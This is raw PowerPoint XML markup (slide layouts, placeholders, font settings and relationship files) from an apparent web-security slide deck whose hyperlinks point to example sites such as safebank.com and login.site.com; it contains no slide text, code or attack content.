            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189571484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obj">
  <p:cSld name="Two Content">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609600" y="2678536"/>
            <a:ext cx="1417532" cy="1264284"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Holder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4400" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="251E06"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1577340"/>
            <a:ext cx="397764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709160" y="1577340"/>
            <a:ext cx="397764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3/13/22</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40403739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BD16E0F6-497C-2841-91E1-8637FBD4A52D}"/>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3BC1D65F-C187-C84E-AC44-6C755F2814EA}"/>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257E36E0-C504-9745-9806-1C6B984C4A65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{692567D0-49CA-024E-8A48-97CD8F1D9B80}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21043838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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{489934B7-262A-D04B-B1B6-0F964335FC5D}"/>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439755A3-977C-C74C-B1BC-087267C5219B}"/>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73EDBEBE-3787-DF40-8447-10A278A50253}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{D00DBE4A-930E-F749-95CB-CCF138959CAC}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40103810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267200" cy="5257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876800" y="1600200"/>
            <a:ext cx="4267200" cy="5257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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C499287E-914F-B347-B000-CE59EADAC1CA}"/>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ACA74C50-CDBF-FB4F-9F74-D73BC156C8B7}"/>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865C4F22-4E57-D949-8999-F8043CC25CE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{8047C7A0-B8CE-E140-A971-CA3962065885}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10447946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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57A3D053-F690-2847-9412-3764593FDF5F}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D97C273C-C7C0-8A4E-ABF8-52E7C4722B53}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3778E94-B187-9A4D-A7BF-6B4ABA58D9D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{1AA9D833-E4E9-124F-B671-AF24D539BE18}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18419793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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CA06D64-6C2F-D34E-BB46-E5F0B88F8682}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDB4D2EA-186D-994F-8CDD-7E2228982D6A}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE1E5ECF-39E8-F340-A25F-4C192D0E9774}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{67DAFC1A-AD73-5E4D-B4A1-2D2489C095E6}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6382343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5D32CEF-3CF4-2D45-B7AA-70ABBC74BEC9}"/>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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{692E168E-34D6-6A42-8AE2-328AEE5AD0E3}"/>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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5827531-A1BC-C840-BDB4-180CA937524E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0B7AF8E3-0E1A-E64F-9CB9-2F1B7C260C07}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9154755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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B24D7984-226E-D749-BD8E-9ECFFF94F15E}"/>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811918E6-F07D-AB43-9C51-7F129EE98AE9}"/>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689947E7-BCE2-DB40-A1FF-DB906D57B5A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{F05B84F5-F0C3-F049-991C-4B558ED00655}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23612201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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{075264D4-C8DC-E64A-83A1-932E50960B44}"/>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DB42ACC8-B407-A545-8747-70C9E4FFC1CE}"/>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31684C58-B665-FF49-B208-A89DB8EFEB35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{5A050297-4C0F-EF41-9EAE-A7E016102A25}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27071973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77DC2ED-ED61-6D44-87F4-1D118C65C209}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="274638"/>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Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47EEE03E-8397-E844-9843-F82DEF5C220A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8686800"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28" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1755E04B-5711-0D42-B387-39BA0FB1D17A}"/>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mn-lt"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1029" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCEAF62A-DB03-5441-876D-F9EA4E9BE0E6}"/>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a:latin typeface="+mn-lt"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01C757B2-5F50-5C46-8920-CB5E308B0BB2}"/>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Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{F78A2917-48A3-7B4E-833F-3D6FEA4479E7}"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pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="ctr" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="ctr" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="ctr" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="ctr" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
          <a:ea typeface="宋体"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hyperlink" Target="http://www.google.com/?q=dingbats" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.safebank.com/" TargetMode="Externa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 Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.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hyperlink" Target="http://b.com/" TargetMode="Externa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google.com/" TargetMode="External"/><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10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://elementor.com/blog/wireframe-website/" TargetMode="External"/><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hyperlink" Target="https://github.com/alrra/browser-logos"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40.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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jpg"/><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hyperlink" Target="https://musicmachinery.com/category/web-services/"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9.jpg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.safebank.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.jp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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide5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9.jpg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.safebank.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.jp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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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hyperlink" Target="http://login.site.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://checkout.site.com/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://othersite.com/" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide62.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://login.site.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://checkout.site.com/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://login.site.com/" TargetMode="Externa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65.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bank.com/BillPay.php" TargetMode="Externa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hyperlink" Target="http://safebank.com/" TargetMode="Externa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7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55.jp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image" Target="../media/image56.jpg"/><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78.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image" Target="../media/image1.jpg"/><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58.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide79.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image" Target="../media/image1.jpg"/><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8.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide8.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.jpg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.safebank.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.jp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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide80.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide81.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide82.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6.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/></Relationships>
</file>

